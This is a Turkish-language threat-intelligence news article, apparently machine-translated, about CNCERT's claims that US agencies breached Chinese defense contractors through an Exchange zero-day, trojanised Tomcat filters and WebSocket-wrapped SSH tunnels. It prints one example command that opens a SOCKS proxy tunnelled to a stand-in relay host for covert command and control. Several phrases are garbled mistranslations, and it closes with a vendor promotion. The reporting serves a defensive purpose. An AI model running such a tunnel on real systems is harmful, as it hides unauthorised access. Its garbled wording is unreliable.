2012’nin ortalarından bu yana, Çin askeri-endüstriyel ağlarının ABD istihbarat teşkilatlarına atfedilen son derece sofistike siber müdahalelerin hedefi olduğu bildiriliyor.
Bu kampanyalar, gizli kötü amaçlı yazılımlar kurmak, uzun süreli erişimi korumak ve hassas savunma verilerini söndürmek için daha önce bilinmeyen güvenlik açıklarından yararlandı.
Başlangıçta Northwestern Politeknik Üniversitesi’ndeki bir NSA ihlalinin ardından tanımlanan CNCERT tarafından ortaya çıkarılan en son olaylar, Çin’in savunma üretimi ve araştırma kuruluşlarına acımasız bir odaklanmayı göstermektedir.
Temmuz 2022’de ortaya çıkan birincil kötü amaçlı yazılım ailesi, Microsoft Exchange sunucularında sıfır günlük bir kusurdan yararlandı. Saldırganlar büyük bir askeri yüklenici içinde bir e -posta sistemini ihlal etti ve yaklaşık bir yıl boyunca kalıcılık yarattı.
Bir dahili etki alanı denetleyicisini sıçrama tahtası olarak kullanarak, izinsiz giriş ekibi elli çekirdek ana bilgisayardan ödün vermek için yanal hareket gerçekleştirdi.
CNCERT analistleri, operatörlerin şaşkın yükler kullandığını, WebSocket ile sarılmış SSH oturumları aracılığıyla tünel attığını ve ağ izlemesinden kaçınmak için Almanya ve Finlandiya’daki röle düğümlerinden trafiği yönlendirdiğini belirtti.
Temmuz ve Kasım 2024 arasında ikinci bir dalgada, rakipler bir tedarikçinin üretim ortamında 300’den fazla cihazda bir elektronik dosya sistemi güvenlik açığı hedefledi.
Meyveden çıkarılmış Romanya ve Hollanda IP adresleri sayesinde, Tomcat servis filtrelerini truva yükseltme paketlerini implante etmek için manipüle ettiler.
Bu ısmarlama Truva atları, tescilli mimari diyagramları ve protokol özelliklerini hasat eden “gizli çalışma” ve “çekirdek ağ” için anahtar kelime aramaları yürüttü.
CNCERT araştırmacıları, bu kampanyanın dinamik günlük silme ve savunmaya özgü saldırı tespit sistemlerinin aktif keşifleri de dahil olmak üzere ayırt edici gizli tekniklerini belirlediler.
Bu açıklamaların ardından, Çin’in Siber Ara İdaresi ve Nvidia arasındaki son görüşmeler tedarik zinciri güvenliğinin kritik öneminin altını çizdi.
Yetkililer, önceden yüklenmiş arka kapıları taşıyabilecek yabancı kaynaklı donanım ve yazılım bileşenlerine güvenme risklerini vurguladılar.
Gizli kanal ve kalıcılık taktikleri
Değişim tabanlı müdahalelerin tanımlayıcı bir özelliği, SSH gizli kanal üzerindeki özel WebSocket’tir. İlk dayanaktan sonra, operatörler bir mesajlaşma hizmeti olarak gizlenmiş bir kullanıcı uzay SSH daemonu yürüttü.
Daemon, WebSocket el sıkışma istekleri için 80 numaralı bağlantı noktasını dinler. Kurulduktan sonra, şifrelenmiş yükler bu tünelden geçerek tipik SSH veya HTTPS uyarılarını tetiklemeden çift yönlü komut ve kontrol sağlayarak. Dinleyici kurulumunun basitleştirilmiş bir örneği:
ssh -o ProxyCommand="websocat ws-connect://relay.example.net:443" \
-N -D localhost:1080 -i /path/to/obf_key.pemBu komut, güvenliği ihlal edilmiş ana bilgisayarda bir çorap vekilini döndürür ve tüm trafiği uzak bir röleden huni yapar. Saldırganlar, SSH’yi standart WebSocket çerçeveleri içinde gizleyerek, kritik ağlara gizli, uzun vadeli erişimi tespit etmeden sürdürdüler.
Entegre etmek Herhangi biri. Gelişmiş tehditleri analiz etmek için siem veya soar ile -> 50 ücretsiz deneme aramasını deneyin